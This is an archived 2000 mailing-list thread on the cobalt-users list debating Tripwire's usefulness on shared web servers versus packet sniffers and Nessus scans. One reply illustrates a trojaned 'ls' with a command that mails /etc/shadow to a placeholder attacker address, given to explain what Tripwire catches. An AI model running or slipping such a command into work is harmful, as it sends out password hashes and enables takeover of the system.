[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [cobalt-users] tripwire
- Subject: RE: [cobalt-users] tripwire
- From: Mark Spieth <mspieth@xxxxxxxxxxxx>
- Date: Thu Mar 2 16:38:48 2000
Actually this is NOT true. You are supposed to define what directories
tripwire monitors. You point it to portions of your server that contain
binary files such as /bin /sbin/ /usr this is where a hacker is going to do
things, not in a users web directory so the fact that those directories
change won't affect tripwire.
>>packet sniffing programs like ISS or what my business partner uses
Sessionwall-3
This only helps to attempt to track down a user. For example, The Bind hack
allows someone to gain a root shell via port 53, so as far as your sniffer
goes, it will probably just see dns traffic. At least if you run tripwire
should a hacker modify binaries on your machine, trip wire will notice the
fact that command "ls" has been modified to do this:
cat /etc/shadow |mail haxor@xxxxxxxxxx
ls
-----Original Message-----
From: Geoff King [mailto:geoff@xxxxxxxxxx]
Sent: Thursday, March 02, 2000 7:31 PM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: Re: [cobalt-users] tripwire
Gary,
I have installed Tripwire on a RedHat Linux v5.2 box.
Basically, it's considerably useless on a server that many people use
because it monitors changes in files, which on a hosting web server, files
change quite often.
I have found the best means of monitoring hackers is to obtain a stand
alone server and use packet sniffing programs like ISS or what my business
partner uses Sessionwall-3. There's a bunch more out there, I can't think
of their names off the top of my head.
I thought it was kind of moot point for Tripwire as you'd only know
after the hacker gained access and modified files. It's much better
watching the knock at the door first.
Now, if the server is not used for many things, such as a secondary DNS
server, and that's it. Tripwire would be a fairly decent tool in that you'd
definately know if someone was on there and messing with files that should
never be changed or modified.
The other thing to do is hack your network yourself. I run Nessus which
is an open-source security scanner about once every 6 months to see what it
can do. It's a good idea to pay attention to the security announcements.
Any administrator should know exactly where someone can break into their
network. Also, an administrator should be able to notice odd or different
behavior of servers and the network fairly quickly.
Anyways, that's my 2 cents worth on tripwire. Good tool, for specific
purposes. Don't ignore it, but don't count on it either.
Geoff
----- Original Message -----
From: "RHLinux" <rhlinux@xxxxxxxxxxx>
To: "Cobalt-Users@xxxxxxxxxxxxxxx" <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, March 02, 2000 2:55 AM
Subject: [cobalt-users] tripwire
> has anyone tired installing tripwire on a raq2-3?
>
> its suppose to help in tracking would be attackers etc...
>
> http://www.zdnet.com/zdnn/stories/news/0,4586,2453339,00.html
>
> Gary
>
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>
_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users